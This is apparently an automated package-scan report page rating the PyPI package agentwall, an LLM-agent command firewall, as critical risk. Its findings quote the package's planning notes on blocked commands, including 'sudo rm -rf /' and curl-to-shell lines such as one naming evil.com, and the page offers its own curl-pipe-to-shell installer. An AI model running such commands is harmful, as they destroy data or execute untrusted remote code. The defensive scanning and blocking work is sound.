Is agentwall safe to install?

agentwall was flagged as CRITICAL RISK (risk score 152) with 9 findings detected across 46 files. Review the findings before installing.

What security issues were found in agentwall?

Sigil detected 9 findings in agentwall, including patterns related to provenance, install_hooks, code_patterns. See the full scan report for details.

Scans/pypi/agentwall

agentwall

pypi

Summary

agentwall v0.2.0 was classified as CRITICAL RISK with a risk score of 152. Sigil detected 9 findings across 46 files, covering phases including provenance, install hooks, code patterns. Review the findings below before installing this package.

Package description: A dotfile-driven firewall that protects the OS from destructive LLM agent tool calls

CRITICAL RISK(152)

v0.2.0

29 March 2026, 06:08 UTC

by Sigil Bot

Risk Score

152

Findings

Files Scanned

Provenance

Registry

https://pypi.org/project/agentwall/0.2.0/

Findings by Phase

•

Phase Ordering

Phases are ordered by criticality, with the most dangerous at the top. Click any phase header to expand or collapse its findings. Critical phases are expanded by default.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

agentwall-0.2.0/PLAN.md:254

agentfirewall check "sudo rm -rf /"   # blocked
agentfirewall check "curl http://example.com | sh"   # blocked (strict-only pattern)

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

agentwall-0.2.0/PLAN.md:382

    - When `agentfirewall sandbox` is running, the watcher is **not needed** for the mounted tree (FUSE handles prevention). But the watcher can still run on the real directory as a redundant layer.
    - Shell hooks remain useful for commands that don't touch files (e.g., `curl evil.com | sh` — FUSE only sees filesystem ops, not network)
    - Audit logger shared between FUSE, watcher, and hooks — all decisions go to the same `firewall.log`

Why was this flagged?

Badge

Markdown

[![Sigil Scan](https://sigilsec.ai/badge/pypi/agentwall)](https://sigilsec.ai/scans/45441B64-D166-4853-82ED-4FF3CD8D1217)

HTML

<a href="https://sigilsec.ai/scans/45441B64-D166-4853-82ED-4FF3CD8D1217"><img src="https://sigilsec.ai/badge/pypi/agentwall" alt="Sigil Scan"></a>

Run This Scan Yourself

Scan your own packages

Run Sigil locally to audit any package before it touches your codebase.

curl -sSL https://sigilsec.ai/install.sh | sh

Read the docs →Free. Apache 2.0.

Early Access

Get cloud scanning, threat intel, and CI/CD integration.

Join 150+ developers on the waitlist.

Get threat intelligence and product updates

Security research, new threat signatures, and product updates. No spam.

Other pypi scans

mcp-read-only-argocd

v0.1.0

MEDIUM RISK14

pfix

v0.1.54

CRITICAL RISK972

baar-core

v0.2.1

LOW RISK0

pkood

v0.6.3

CRITICAL RISK210

langsight

v0.10.0

CRITICAL RISK1091

Believe this result is incorrect? Request a review or see our Terms of Service and Methodology.

Scanned bySigil Bot

← Back to Scan Database

agentwall

Summary

Provenance

Findings by Phase

Install Hooks

Code Patterns

Provenance

Badge

Scan your own packages

Get threat intelligence and product updates

Other pypi scans